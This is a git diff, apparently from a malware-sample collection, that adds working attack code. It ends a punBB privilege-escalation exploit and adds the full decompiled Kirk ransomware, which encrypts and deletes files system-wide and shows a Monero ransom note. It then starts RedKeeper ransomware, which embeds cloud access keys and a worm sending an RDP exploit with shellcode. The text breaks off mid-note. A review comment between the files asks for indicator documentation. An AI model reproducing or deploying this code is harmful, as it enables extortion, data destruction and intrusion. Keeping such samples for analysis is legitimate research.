'form_sent' : 1 + } + + wclient = urllib.URLopener() + + print "[+] Connecting to retrieve cookie" + + req = wclient.open(host + "/login.php?action=in", urllib.urlencode(params)) + info = req.info() + if 'set-cookie' not in info: + print "[-] Unable to retrieve cookie... 
something is wrong" + sys.exit(-3) + cookie = info['set-cookie'] + cookie = cookie[:string.find(cookie, ';')] + print "[+] Cookie found - extracting user_id" + user_id = cookie[string.find(cookie, "%3A%22")+6:string.find(cookie, "%22%3B")] + print "[+] User-ID: %d" % (int(user_id)) + wclient.addheader('Cookie', cookie); + + email = '"' + email[:string.find(email, '@')] + '"@' + email[string.find(email, '@')+1:] + ',"\',' + append = 'group_id=\'1' + email = email + ( ((50-len(append))-len(email)) * ' ' ) + append + '"@' + domain + + params = { + 'req_new_email' : email, + 'form_sent' : 1 + } + + print "[+] Connecting to request change email" + req = wclient.open(host + "profile.php?action=change_email&id=" + user_id, urllib.urlencode(params)) + + print "[+] Done... Now wait for the email. Log into punBB, go to the link in the email and become admin" + +if __name__ == "__main__": + main() + + + diff --git a/Python/Kirk_ransomware.py b/Python/Kirk_ransomware.py new file mode 100644 index 00000000..3d4ff750 --- /dev/null +++ b/Python/Kirk_ransomware.py 
@@ -0,0 +1,208 @@ +# Python bytecode 2.7 (62211) +# Decompiled from: Python 2.7.14 (default, Sep 25 2017, 09:53:22) +""" + +Kirk encryptor + +""" +import tkMessageBox, Tkinter as tk +from Crypto.Cipher import AES +from Crypto.PublicKey import RSA +from Crypto.Hash import SHA256 +import os, random, string, time, threading, Queue, datetime +tn = datetime.datetime.now() +tn_2 = datetime.datetime.strftime(tn + datetime.timedelta(days=2), '%c') +tn_7 = datetime.datetime.strftime(tn + datetime.timedelta(days=7), '%c') +tn_14 = datetime.datetime.strftime(tn + datetime.timedelta(days=14), '%c') +tn_30 = datetime.datetime.strftime(tn + datetime.timedelta(days=30), '%c') +tn_31 = datetime.datetime.strftime(tn + datetime.timedelta(days=31), '%c') +tn = datetime.datetime.strftime(tn, '%c') +deltas = [ + tn_2, tn_7, tn_14, tn_30, tn_31] +TK_TITLE = 'Low Orbital Ion Cannon | When harpoons, air strikes and nukes fail | v1.0.1.0' +NOTE_NAME = 'RANSOM_NOTE.txt' +PWDF_NAME = 'pwd' +THREAD_NUM = 22 +queue = Queue.Queue() +files_to_enc = [] +pubkeyDat = '-----BEGIN PUBLIC KEY-----\nMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAoQpUk7lhDoenoPTCLRjG\nLStBjoT9owWl3HuYezrpmDt60t0P4/jlrwDC06POYxGpDDUbC2SfhcvbemFXWmX/\nzCM92h94v6sxfc6GOfKLbdwudSMOJ+TOSd7XGa3okcIbAh7bVR28XPBOGcg203Z/\n7YJh+wHHnjGjOxcUZIcM3X2BPDIEuc1jxgWgDEIMmjb+yi6m3YdtAmwmurV8wb61\njXrBY936IVxYc3sxw94x9GjfsIspmdurV5En1DEkXPORp7IU5q6Zj4ZZsLwyT+xX\n5V5MdWVYhOJV4X8pLPHUPjvAHQX1POGnX/DVlieG//RXOi0mnR+Vh4OjvBsXC10V\nqrQgZZXByHOtjrdfXgZH8Izr+KuyTVRGILvj884EZ1DMI6L4sb4F9EUjcRacO/tU\nRdduUTw3Q5qsbLPQiS/V4MBEQswlH7UVMiWxfNymyvM5I3BfFeW2QwauRGH5xmaD\nsQG0Yy/AsPzvHKqoShP/LepO1bYUdUodvnfVbChPGTYzZrwmnixS/m5AxyhUh/Ex\n3cxZ5raJWnBfx72wsviuAPIrXqyzlTlNo6aPX029Oh52ezk4uYwLpN02IjJ6yUEg\nyFkqbhASCtvYjqAprvCheane2j7+U7RnjZ+jLNgMWSc5M1pdGK4YYT+U3yfWqbdG\nRSie6e+LhifKADqjHeXSAVsCAwEAAQ==\n-----END PUBLIC KEY-----' +pk = RSA.importKey(pubkeyDat) +rp = None +UNDOC_EXTS = [ + 'cfr', 'ytd', 'sngw', 'tst', 'skudef', 'dem', 'sims3pack', 'hbr', + 'hkx', 
'rgt', 'ggpk', 'ttarch2', 'hogg', 'spv', 'bm2', 'lua', 'dff', + 'save', 'rgssad', 'scm', 'aud', 'rxdata', 'mcmeta', 'bin', 'mpqe', + 'rez', 'xbe', 'grle', 'bf', 'iwd', 'vpp_pc', 'scb', 'naz', 'm2', 'xpk', + 'sabs', 'nfs13save', 'gro', 'emi', 'wad', '15', 'vfs', 'drs', 'taf', 'm4s', + 'player', 'umv', 'sgm', 'ntl', 'esm', 'qvm', 'arch00', 'tir', 'bk', 'sabl', + 'bin', 'opk', 'vfs0', 'xp3', 'tobj', 'rcf', 'sga', 'esf', 'rpack', 'DayZProfile', + 'qsv', 'gam', 'bndl', 'u2car', 'psk', 'gob', 'lrf', 'lts', 'iqm', 'i3d', 'acm', + 'SC2Replay', 'xfbin', 'db0', 'fsh', 'dsb', 'cry', 'osr', 'gcv', 'blk', '4', 'lzc', + 'umod', 'w3x', 'mwm', 'crf', 'tad', 'pbn', '14', 'ppe', 'ydc', 'fmf', 'swe', 'nfs11save', + 'tgx', 'trf', 'atlas', '20', 'game', 'rw', 'rvproj2', 'sc1', 'ed', 'lsd', 'pkz', 'rim', + 'bff', 'gct', '9', 'fpk', 'pk3', 'osf', 'bns', 'cas', 'lfl', 'rbz', 'sex', 'mrm', 'mca', + 'hsv', 'vpt', 'pff', 'i3chr', 'tor', '01', 'utx', 'kf', 'dzip', 'fxcb', 'modpak', 'ydr', + 'frd', 'bmd', 'vpp', 'gcm', 'frw', 'baf', 'edf', 'w3g', 'mtf', 'tfc', 'lpr', 'pk2', 'cs2', + 'fps', 'osz', 'lnc', 'jpz', 'tinyid', 'ebm', 'i3exec', 'ert', 'sv4', 'cbf', 'oppc', 'enc', + 'rmv', 'mta', 'otd', 'pk7', 'gm', 'cdp', 'cmg', 'ubi', 'hpk', 'plr', 'mis', 'ids', + 'replay_last_battle', 'z2f', 'map', 'ut4mod', 'dm_1', 'p3d', 'tre', 'package', 'streamed', + 'l2r', 'xbf', 'wep', 'evd', 'dxt', 'bba', 'profile', 'vmt', 'rpf', 'ucs', 'lab', 'cow', 'ibf', + 'tew', 'bix', 'uhtm', 'txd', 'jam', 'ugd', '13', 'dc6', 'vdk', 'bar', 'cvm', 'wso', 'xxx', 'zar', + 'anm', '6', 'ant', 'ctp', 'sv5', 'dnf', 'he0', 'mve', 'emz', 'e4mod', 'gxt', 'bag', 'arz', 'tbi', + 'itp', 'i3animpack', 'vtf', 'afl', 'ncs', 'gaf', 'ccw', 'tsr', 'bank', 'lec', 'pk4', 'psv', + 'los', 'civ5save', 'rlv', 'nh', 'sco', 'ims', 'epc', 'rgm', 'res', 'wld', 'sve', 'db1', 'dazip', + 'vcm', 'rvm', 'eur', 'me2headmorph', 'azp', 'ags', '12', 'slh', 'cha', 'wowsreplay', 'dor', + 'ibi', 'bnd', 'zse', 'ddsx', 'mcworld', 'intr', 'vdf', 'mtr', 'addr', 
'blp', 'mlx', 'd2i', '21', + 'tlk', 'gm1', 'n2pk', 'ekx', 'tas', 'rav', 'ttg', 'spawn', 'osu', 'oac', 'bod', 'dcz', 'mgx', + 'wowpreplay', 'fuk', 'kto', 'fda', 'vob', 'ahc', 'rrs', 'ala', 'mao', 'udk', 'jit', '25', 'swar', + 'nav', 'bot', 'jdf', '32', 'mul', 'szs', 'gax', 'xmg', 'udm', 'zdk', 'dcc', 'blb', 'wxd', 'isb', + 'pt2', 'utc', 'card', 'lug', 'JQ3SaveGame', 'osk', 'nut', 'unity', 'cme', 'elu', 'db7', 'hlk', + 'ds1', 'wx', 'bsm', 'w3z', 'itm', 'clz', 'zfs', '3do', 'pac', 'dbi', 'alo', 'gla', 'yrm', 'fomod', + 'ees', 'erp', 'dl', 'bmd', 'pud', 'ibt', '24', 'wai', 'sww', 'opq', 'gtf', 'bnt', 'ngn', 'tit', 'wf', + 'bnk', 'ttz', 'nif', 'ghb', 'la0', 'bun', '11', 'icd', 'z3', 'djs', 'mog', '2da', 'imc', 'sgh', 'db9', + '42', 'vis', 'whd', 'pcc', '43', 'ldw', 'age3yrec', 'pcpack', 'ddt', 'cok', 'xcr', 'bsp', 'yaf', + 'swd', 'tfil', 'lsd', 'blorb', 'unr', 'mob', 'fos', 'cem', 'material', 'lfd', 'hmi', 'md4', 'dog', + '256', 'eix', 'oob', 'cpx', 'cdata', 'hak', 'phz', 'stormreplay', 'lrn', 'spidersolitairesave-ms', + 'anm', 'til', 'lta', 'sims2pack', 'md2', 'pkx', 'sns', 'pat', 'tdf', 'cm', 'mine', 'rbn', 'uc', 'asg', + 'raf', 'myp', 'mys', 'tex', 'cpn', 'flmod', 'model', 'sfar', 'fbrb', 'sav2', 'lmg', 'tbc', 'xpd', + 'bundledmesh', 'bmg', '18', 'gsc', 'shader_bundle', 'drl', 'world', 'rwd', 'rwv', 'rda'] +REAL_EXTS = [ + '.3g2', '.3gp', '.asf', '.asx', '.avi', '.flv', '.ai', + '.m2ts', '.mkv', '.mov', '.mp4', '.mpg', '.mpeg', 'mpeg4', + '.rm', '.swf', '.vob', '.wmv', '.doc', '.docx', '.pdf', + '.rar', '.jpg', '.jpeg', '.png', '.tiff', '.zip', '.7z', '.dif.z', + '.exe', '.tar.gz', '.tar', '.mp3', '.sh', '.c', '.cpp', + '.h', '.mov', '.gif', '.txt', '.py', '.pyc', '.jar', '.csv', + '.psd', '.wav', '.ogg', '.wma', '.aif', '.mpa', '.wpl', '.arj', + '.deb', '.pkg', '.db', '.dbf', '.sav', '.xml', '.html', '.aiml', + '.apk', '.bat', '.bin', '.cgi', '.pl', '.com', '.wsf', '.bmp', + '.bmp', '.gif', '.tif', '.tiff', '.htm', '.js', '.jsp', '.php', + '.xhtml', '.cfm', '.rss', 
'.key', '.odp', '.pps', '.ppt', '.pptx', + '.class', '.cd', '.java', '.swift', '.vb', '.ods', '.xlr', '.xls', + '.xlsx', '.dot', '.docm', '.dotx', '.dotm', '.wpd', '.wps', '.rtf', + '.sdw', '.sgl', '.vor', '.uot', '.uof', '.jtd', '.jtt', '.hwp', '.602', + '.pdb', '.psw', '.xlw', '.xlt', '.xlsm', '.xltx', '.xltm', '.xlsb', + '.wk1', '.wks', '.123', '.sdc', '.slk', '.pxl', '.wb2', '.pot', '.pptm', + '.potx', '.potm', '.sda', '.sdd', '.sdp', '.cgm', '.wotreplay', '.rofl', + '.pak', '.big', '.bik', '.xtbl', '.unity3d', '.capx', '.ttarch', '.iwi', + '.rgss3a', '.gblorb', '.xwm', '.j2e', '.mpk', '.xex', '.tiger', '.lbf', + '.cab', '.rx3', '.epk', '.vol', '.asset', '.forge', '.lng', '.sii', '.litemod', + '.vef', '.dat', '.papa', '.psark', '.ydk', '.mpq', '.wtf', '.bsa', '.re4', + '.dds', '.ff', '.yrp', '.pck', '.t3', '.ltx', '.uasset', '.bikey', '.patch', + '.upk', '.uax', '.mdl', '.lvl', '.qst', '.ddv', '.pta'] +INIT_EXTS = [] + REAL_EXTS +for ue in UNDOC_EXTS: + INIT_EXTS.append('.' + ue) +seen = [] +ALL_EXTS = [] +for re in INIT_EXTS: + if re in seen: + pass + else: + ALL_EXTS.append(re) + seen.append(re) +cols = 9 +if len(REAL_EXTS) % cols != 0: + for ec in range(cols - len(REAL_EXTS) % cols): + REAL_EXTS.append(' ') +split = [ REAL_EXTS[i:i + len(REAL_EXTS) / cols] for i in range(0, len(REAL_EXTS), len(REAL_EXTS) / cols) ] +PRETTY_EXTS = '' +for row in zip(*split): + PRETTY_EXTS += '\n ' + ('').join((str.ljust(i, 10) for i in row)) +R_NOTE = ('\n :xxoc;;,.. .\n cWW0olkNMMMKdl;. .;llxxklOc,\'\n oWMKxd, .,lxNKKOo;. :xWXklcc;. ...\'.\n k lMMNl . ON. :c. \'\'. \':....\n .WXc ;WMMMXNNXKKxdXMM. . .\n .NdoK: XMMMMMMMMMMMMMMM;oo; ...;,cxxxll. .\n .WX.K0\'WMMMWMMMMMWMNXWMooMWNO\' ..,;OKNWWWWMMMMMXk:.\n KK:xKKWMMMXNMMMMW; .. :WNKd, .. .\'cdOXKXNNNNNWWMMMMMMMW0,\n lNMXXMMMMMMMMWWMMWKk, ;0k\' .,cxxk0K0O0XXWWMMMMMMMMMMMMMMX:.. ..\n ..,;XMMMMMMMWXWWK0KK: .;. .:lddddxOOO0XWMMMMMMMMMMMMMMMMMMO. .,\n .kKXMMMMMWkoxolcc;.. .\':loodxO00OO0NNXNWMMMMMMMMMMMMMMMN; \'.\n .MK;kWMMMWWKOc. . 
..\';cdxkKNX0kOOOKNMMMMMMMMMMMMMMMMMW: .\n ,MW:,:x0NMMMMWW0x\' ..,:dXNWW0xkkKWMMMMMMMMMMMMMMMMMMWk. ..\n oMMN; ;odoccc;c:. ...lXWWMOok0NMMMMMWNXKXKXWMMMMMMMOc.\n XMMMX, ....\';lldkWkodK0loc\'. .\'lxx0kOKNMMMXo.\n \'XMMMMMNc .dldXWx. ..,,coOXOkXMMMK,\n ,. .:dk0KNWMk. ... .kWMK,. ..:c .:.. .0MWMMMMO.\n .\':x0K0:. .. . . .OWMNNXO:cccdxKXWMW0o0WWMMMM;.\n 00000000000kdl:,\'. ..\'o00l \'KMMNKNWWNKXWWMMMMMMMMMMMMMM0.\n 0000000000000000000Oxl:\' .;xKWWx .xNMMMWNMMMMMMMMMMMMMMMMMMMMMMl\n 0000000000000000000000000x;. ..,::,. .ck0KKk\' \'0WMMMMMMMWWMMMMMMMMMMMMMMMMMM0. .\'\n 0000000000000000000000000000Oxdllc:;,....,\'... .cdkOko: ,cOKKXWMMMKd0WMMMMMMMMMMMMMWW0. \'Kc:,\n 000000000000000000000000000000000OkkkxdoodxOkoooool .;okOx, .,\'...cKMXl\'oKWMMMMMMMWWNXN0 \'MMc0.\n 0000OO000000000000000000000000000000000000000kc. .:dk0c ,KNKxdKMMM0;;kMMMMMMMMWNKXO ,kW0xl\n OdloxO000000000000000000000000000000000000000000x, .,ll; .lokKWMMMMMMMMM0xNMMMMMMMNXXNo.xK;cXKx\n lx000000000000000000000000000000000000000000000000l .\'.. .\'cKWXOXMMMMMMMMMMMMMMMMMWWNXXNKX0MNkNK0..\n 00000000000000000000000000000000000000000000000000O .. ..,;ok0X000KKXWMNNMMMMMMMMNNXKKXX00MMMWWc\',\n 00000000000000000000000000000000000000000000000000d .. ..........;;.cKMMMMMWNXKKXNKxkNMMX,\n 000000000000000000000000000000000000000Ko.0000000Ol .\'::odkkOOOxxxoxNMMMMNNWNXKK0k..;\'\n 0000000000000000000000000000000000000000..:000000kl .:coododkXWMMMMMMMWWMMMNNNNNKOkkx:\n :;ok00000000000000000000000000000000000O.;.d00000dc ... .........cONMMMMMMMMMNXXXN0dlddxN.\n .dk000000000000000000000000000000000000;ld,.O00kocc .. ...,;::lokKNMMMMMMMMWKOO0OxloocxM:\n OO0000000000000000000000000000000000000ol0Koc0xc:ll . ..;lxO0XNNMMMMMMMMMMMN0xoxOdl::,;0Md\n :;,\'..;loxk000000000000000000000000000000000lx..loo ,0 .\'\';lkKKNMMMMMMMMMNOd:;lc:;\'..,kWMK\n cccldxkkkO00Okdooddxk00000000000000000000000Oc\'lddl dK, .\':ollokOOOOOOOc\'.........lXMMMM,\n 000000kdoc,....;cldkO0000000000000000000000Okdodddo\'K0\'. ....... 
.oKMMMMMM0\n :,\'....\',;:ldkO0000000000000000000000000000Okxodddd;Xk,... .l0NMMMMMMMM:\n OO000000000000000000000000000000000000000000OkodxxxoXo,,,.. .:kKWMMMMMMMMMW\'\n dO0000000000000000000000000000000000000000000OodxxxkKl;,,,, \'dOKWMMMMMMMMMMMX\n\n _ _____ ____ _ __ ____ _ _ _ ____ ___ __ ____ ___ ____ _____ \n | |/ /_ _| _ \\| |/ / | _ \\ / \\ | \\ | / ___| / _ \\| \\/ \\ \\ / / \\ | _ \\| ____|\n | \' / | || |_) | \' / | |_) | / _ \\ | \\| \\___ \\| | | | |\\/| |\\ \\ /\\ / / _ \\ | |_) | _| \n | . \\ | || _ <| . \\ | _ < / ___ \\| |\\ |___) | |_| | | | | \\ V V / ___ \\| _ <| |___ \n |_|\\_\\___|_| \\_\\_|\\_\\ |_| \\_\\/_/ \\_\\_| \\_|____/ \\___/|_| |_| \\_/\\_/_/ \\_\\_| \\_\\_____|\n\n\nOh no! The Kirk ransomware has encrypted your files!\n\n\n-----------------------------------------------------------------------------------------------------\n\n> ! IMPORTANT ! READ CAREFULLY:\n\nYour computer has fallen victim to the Kirk malware and important files have been encrypted - locked\nup so they don\'t work. This may have broken some software, including games, office suites etc.\n\nHere\'s a list of some the file extensions that were targetted:\n{}\n\nThere are an additional {} file extensions that are targetted. They are mostly to do with games.\n\nTo get your files back, you need to pay. Now. Payments recieved more than 48 hours after the time of\ninfection will be charged double. Further time penalties are listed below. The time of infection has\nbeen logged.\n\nAny files with the extensions listed above will now have the extra extension \'.kirked\', these files\nare encrypted using military grade encryption.\n\nIn the place you ran this program from, you should find a note (named {}) similar to this one.\nYou will also find a file named \'{}\' - this is your encrypted password file. Although it was\ngenerated by your computer, you have no way of ever decrypting it. 
This is due to the security\nof both the way it was generated and the way it was encrypted. Your files were encrypted using\nthis password.\n\n ____ ____ ___ ____ _ __ _____ ___ _____ _ _ _____ ____ _____ ____ ____ _ _ _____ _ \n/ ___|| _ \\ / _ \\ / ___| |/ / |_ _/ _ \\ |_ _| | | | ____| | _ \\| ____/ ___| / ___| | | | ____| |\n\\___ \\| |_) | | | | | | \' / | || | | | | | | |_| | _| | |_) | _| \\___ \\| | | | | | _| | |\n ___) | __/| |_| | |___| . \\ | || |_| | | | | _ | |___ | _ <| |___ ___) | |___| |_| | |___|_|\n|____/|_| \\___/ \\____|_|\\_\\ |_| \\___/ |_| |_| |_|_____| |_| \\_\\_____|____/ \\____|\\___/|_____(_)\n\n "Logic, motherfucker." ~ Spock.\n\n\nDecrypting your files is easy. Take a deep breath and follow the steps below.\n\n 1 ) Make the proper payment.\n Payments are made in Monero. This is a crypto-currency, like bitcoin.\n You can buy Monero, and send it, from the same places you can any other\n crypto-currency. If you\'re still unsure, google \'bitcoin exchange\'.\n\n Sign up at one of these exchange sites and send the payment to the address below.\n\n Make note of the payment / transaction ID, or make one up if you have the option.\n\n Payment Address (Monero Wallet):\n 4AqSwfTexbNaHcn8giSJw3KPiWYHGBaCF9bdgPxvHbd5A8Q3Fc7n6FQCReEns8uEg8jUo4BeB79rwf4XSfQPVL1SKdVp2jz\n\n Prices:\n Days : Monero : Offer Expires\n 0-2 : 50 : {}\n 3-7 : 100 : {}\n 8-14 : 200 : {}\n 15-30 : 500 : {}\n\n Note: In 31 days your password decryption key gets permanently deleted.\n You then have no way to ever retrieve your files. 
So pay now.\n\n 2 ) Email us.\n Send your pwd file as an email attachment to one of the email addresses below.\n Include the payment ID from step 1.\n\n Active email addresses:\n kirk.help@scryptmail.com\n kirk.payments@scryptmail.com\n\n 3 ) Decrypt your files.\n You will recieve your decrypted password file and a program called \'Spock\'.\n Download these both to the same place and run Spock.\n Spock reads in your decrypted password file and uses it to decrypt all of the\n affected files on your computer.\n\n > IMPORTANT !\n The password is unique to this infection.\n Using an old password or one from another machine will result in corrupted files.\n Corrupted files cannot be retrieved.\n Don\'t fuck around.\n\n 4 ) Breathe.\n\n\n _ _____ _______ _ ___ _ _ ____ \n | | |_ _\\ \\ / / ____| | | / _ \\| \\ | |/ ___|\n | | | | \\ \\ / /| _| | | | | | | \\| | | _ \n | |___ | | \\ V / | |___ | |__| |_| | |\\ | |_| |\n |_____|___| \\_/ |_____| |_____\\___/|_| \\_|\\____|\n _ _ _ ____ ____ ____ ___ ____ ____ _____ ____ \n / \\ | \\ | | _ \\ | _ \\| _ \\ / _ \\/ ___|| _ \\| ____| _ \\ \n / _ \\ | \\| | | | | | |_) | |_) | | | \\___ \\| |_) | _| | |_) |\n / ___ \\| |\\ | |_| | | __/| _ <| |_| |___) | __/| |___| _ < \n /_/ \\_\\_| \\_|____/ |_| |_| \\_\\\\___/|____/|_| |_____|_| \\_\\\n\n\n\n').format(PRETTY_EXTS, len(UNDOC_EXTS), NOTE_NAME, PWDF_NAME, tn_2, tn_7, tn_14, tn_30) + +def select_files(): + global queue + ext = ALL_EXTS + for root, dirs, files in os.walk('/'): + for file in files: + if file.lower().endswith(tuple(ext)): + queue.put(os.path.join(root, file)) + +class Worker(threading.Thread): + def __init__(self, queue): + threading.Thread.__init__(self) + self.queue = queue + + def run(self): + while True: + qItem = self.queue.get() + try: + self.encrypt(qItem) + with open(qItem, 'wb'): + pass + try: + os.remove(qItem) + except Exception as ex: + pass + except Exception as ex: + pass + self.queue.task_done() + + def encrypt(self, filename): + global rp + 
chunk_size = 65536 + outputFile = filename + '.kirked' + filesize = str(os.path.getsize(filename)).zfill(16) + IV = '' + for i in range(16): + IV += chr(random.randint(0, 255)) + encryptor = AES.new(rp, AES.MODE_CBC, IV) + with open(filename, 'rb') as (infile): + with open(outputFile, 'wb') as (outfile): + outfile.write(filesize) + outfile.write(IV) + while True: + chunk = infile.read(chunk_size) + if len(chunk) == 0: + break + else: + if len(chunk) % 16 != 0: + chunk += ' ' * (16 - len(chunk) % 16) + outfile.write(encryptor.encrypt(chunk)) + +def drop_note(): + with open(NOTE_NAME, 'wb+') as (rnf): + rnf.write(R_NOTE) + +def Main(): + global rp + orp = tn + ('').join((random.choice(string.ascii_uppercase + string.ascii_lowercase + string.digits) for _ in range(64))) + rp = SHA256.new(orp).digest() + if rp == None: + quit() + try: + with open(PWDF_NAME, 'wb') as (pwdf): + encp = pk.encrypt(orp, 32)[0] + pwdf.write(encp) + except Exception: + pass + for i in range(THREAD_NUM): + w = Worker(queue) + w.setDaemon(True) + w.start() + tkMessageBox.showinfo(TK_TITLE, 'The LOIC is initializing for your system ...\nThis may take some time') + select_files() + queue.join() + drop_note() + root = tk.Tk() + root.title('Kirk') + scrollbar = tk.Scrollbar(root) + scrollbar.pack(side=tk.RIGHT, fill=tk.Y) + T = tk.Text(root, height=50, width=110, background='black', foreground='white', yscrollcommand=scrollbar.set) + T.pack(side=tk.LEFT) + T.insert(tk.END, R_NOTE) + T.config(state='disabled') + scrollbar.config(command=T.yview) + root.update() + root.mainloop() + return + +if __name__ == '__main__': + try: + with open('pwd', 'r') as (test_pwdf): + tkMessageBox.showinfo('Kirk', 'We recommend that you do NOT run this again') + quit() + except Exception as ex: + pass + Main() diff --git a/Python/RedKeeper-ransomware_source.py b/Python/RedKeeper-ransomware_source.py new file mode 100644 index 00000000..372b8857 --- /dev/null +++ b/Python/RedKeeper-ransomware_source.py 
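Review bot: The sample is committed without any provenance or indicator documentation, so a triager has to read the whole decompiled hunk to learn what this family leaves on disk; the decompiler banner on the first two lines records only the bytecode version, not where the sample came from. A header comment at the top of the file should record the source and the hash of the original `.pyc`, e.g. `# sha256: <SHA256_OF_ORIGINAL_PYC>` (placeholder, fill from the archive), and list the host artifacts already visible in the code: the `.kirked` suffix written by `encrypt`, the `RANSOM_NOTE.txt` note from `drop_note`, the `pwd` file written in `Main`, and the Tk window title held in `TK_TITLE`. The Monero address and the two `scryptmail.com` contact addresses embedded in `R_NOTE` should be called out in that header as IoCs rather than left to be discovered inside the note string.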
@@ -0,0 +1,220 @@ +# uncompyle6 version 2.11.5 +# Python bytecode 2.7 (62211) +# Decompiled from: Python 2.7.16 (default, Apr 12 2019, 15:32:40) +# [GCC 4.2.1 Compatible Apple LLVM 10.0.1 (clang-1001.0.46.3)] +# Embedded file name: redkeeper.py +# Compiled at: 2018-09-20 11:31:08 +from os.path import expanduser +import socket +import glob +import os +from random import randint, choice +import struct +import string +from Crypto.Cipher import AES +from Crypto.Hash import SHA256 +from Crypto import Random +import requests +import sys +aws_access_key_id = 'AKIA35OHX2DSKHT73VPQ' +aws_secret_access_key = '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' + +def pdu_connect_initial(hostname): + host_name = '' + for i in hostname: + host_name += struct.pack('<h', ord(i)) + + host_name += '\x00' * (32 - len(host_name)) + mcs_gcc_request = '\x03\x00\x01\xca\x02\xf0\x80\x7fe\x82\x01\xbe\x04\x01\x01\x04\x01\x01\x01\x01\xff0 \x02\x02\x00"\x02\x02\x00\x02\x02\x02\x00\x00\x02\x02\x00\x01\x02\x02\x00\x00\x02\x02\x00\x01\x02\x02\xff\xff\x02\x02\x00\x020 \x02\x02\x00\x01\x02\x02\x00\x01\x02\x02\x00\x01\x02\x02\x00\x01\x02\x02\x00\x00\x02\x02\x00\x01\x02\x02\x04 \x02\x02\x00\x020 \x02\x02\xff\xff\x02\x02\xfc\x17\x02\x02\xff\xff\x02\x02\x00\x01\x02\x02\x00\x00\x02\x02\x00\x01\x02\x02\xff\xff\x02\x02\x00\x02\x04\x82\x01K\x00\x05\x00\x14|\x00\x01\x81B\x00\x08\x00\x10\x00\x01\xc0\x00Duca\x814\x01\xc0\xd8\x00\x04\x00\x08\x00 \x03X\x02\x01\xca\x03\xaa\t\x04\x00\x00(\n\x00\x00' + mcs_gcc_request += host_name + mcs_gcc_request += 
'\x04\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xca\x01\x00\x00\x00\x00\x00\x18\x00\x07\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\xc0\x0c\x00\t\x00\x00\x00\x00\x00\x00\x00\x02\xc0\x0c\x00\x03\x00\x00\x00\x00\x00\x00\x00\x03\xc0D\x00\x04\x00\x00\x00' + channel_name = [ + 'NEVER\x00\x00\x00\x00\x00\x00\x00', 'GONNA\x00\x00\x00\x00\x00\x00\x00', 'GIVE\x00\x00\x00\x00\x00\x00\x00\x00', 'YOU\x00\x00\x00\x00\x00\x00\x00\x00\x00', 'UP\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'] + mcs_gcc_request += choice(channel_name) + mcs_gcc_request += 'MS_T120\x00\x00\x00\x00\x00rdpsnd\x00\x00\xc0\x00\x00\x00snddbg\x00\x00\xc0\x00\x00\x00rdpdr\x00\x00\x00\x80\x80\x00\x00' + return mcs_gcc_request + + +def worm(target): + uname = [ + '@e_kaspersky', '@briankrebs', '@kevinmitnick'] + hname = ['talso', 'sphos', 'startgame', 'mcoffee', 'slowseven', 'selloutvault', 'stratforkoff'] + username = choice(uname) + hostname = choice(hname) + try: + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.settimeout(2) + s.connect((target, 3389)) + except Exception as e: + s.close() + return + + x_224_conn_req = '\x03\x00\x00{0}' + x_224_conn_req += chr(33 + len(username)) + x_224_conn_req += '\xe0' + x_224_conn_req += '\x00\x00' + x_224_conn_req += '\x00\x00' + x_224_conn_req += '\x00' + x_224_conn_req += 'Cookie: mstshash=' + x_224_conn_req += username + x_224_conn_req += '\r\n' + x_224_conn_req += '\x01' + x_224_conn_req += '\x00' + x_224_conn_req += '\x08\x00' + x_224_conn_req += 
'\x00\x00\x00\x00' + try: + s.sendall(x_224_conn_req.format(chr(33 + len(username) + 5))) + s.recv(8192) + s.sendall(pdu_connect_initial(hostname)) + res = s.recv(10000) + except Exception as e: + s.close() + return + + shellcode = '1\xc9' + shellcode += 'd\x8bq0' + shellcode += '\x8bv\x0c' + shellcode += '\x8bv\x1c' + shellcode += '\x8b6' + shellcode += '\x8b\x06' + shellcode += '\x8bh\x08' + shellcode += '\xeb ' + shellcode += '[' + shellcode += 'S' + shellcode += 'U' + shellcode += '[' + shellcode += '\x81\xeb\x11\x11\x11\x11' + shellcode += '\x81\xc3\xda?\x1a\x11' + shellcode += '\xff\xd3' + shellcode += '\x81\xc3\x11\x11\x11\x11' + shellcode += '\x81\xeb\x8c\xcc\x18\x11' + shellcode += '\xff\xd3' + shellcode += '\xe8\xdb\xff\xff\xff' + shellcode += 'cmd' + try: + s.sendall(shellcode) + s.close() + except Exception as e: + s.close() + return + + +def drop_note(img): + bdy = ['You wil have to pay us before you git him from us, and pay us a big cent to, if you put the cops hunting for him you is only defeeting yu own end.', 'If you install this on a microcomputer... then under terms of this license you agree to pay PC Cyborg Corporation in full for the cost of leasing these programs...In the case of your breach of this license agreement, PC Cyborg reserves the right to take legal action necessary to recover any outstanding debts payable to PC Cyborg Corporation and to use program mechanisms to ensure termination of your use...These program mechanisms will adversely affect other program applications...You are hereby advised of the most serious consequences of your failure to abide by the terms of this license agreement; your conscience may haunt you for the rest of your life...and your PC will stop functioning normally... 
You are strictly prohibited from sharing this product with others...', 'A company can spend hundreds of thousands of dollars on firewalls, intrusion detection systems and encryption and other security technologies, but if an attacker can call one trusted person within the company, and that person complies, and if the attacker gets in, then all that money spent on technology is essentially wasted.', 'You cannot arrest an idea', 'Most hackers are young because young people tend to be adaptable. As long as you remain adaptable, you can always be a good hacker.', 'All right hes in the personal ads. Disappointed white male. Cross dresser looking for discreet friend to bring dreams to realiy. Leather, lace and water sports. Transvestites welcome.'] + footer = "Your files have been encrypted. To decrypt your files send 1,000,000 satoshi (Don't you think we should ask more than 1 million satoshi ?) to address 19GL2cUrn1Xx8XD6VaL25SYAzQd6qnwVb7 " + special = 'If you like to be a hero when balance is over 100,000,000 